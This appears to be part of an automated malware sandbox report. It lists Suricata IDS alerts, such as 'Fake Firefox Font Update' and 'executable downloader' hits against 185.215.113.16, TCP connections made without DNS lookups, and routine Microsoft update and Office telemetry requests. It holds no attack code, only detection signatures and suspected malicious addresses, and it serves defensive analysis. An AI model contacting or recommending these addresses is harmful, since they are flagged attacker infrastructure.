                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50128 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50144 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50147 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50136 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50162 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50167 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50185 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50178 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50189 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50244 -> 20.42.65.92:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50289 -> 20.42.65.94:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50373 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50392 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50377 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50382 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50396 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50383 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50387 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50386 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50375 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50398 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50395 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50380 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50390 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50400 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50402 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50154 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50413 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50415 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50404 -> 188.114.97.3:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gGycNp42KykxeBF&MD=kGXnbV+K HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gGycNp42KykxeBF&MD=kGXnbV+K HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
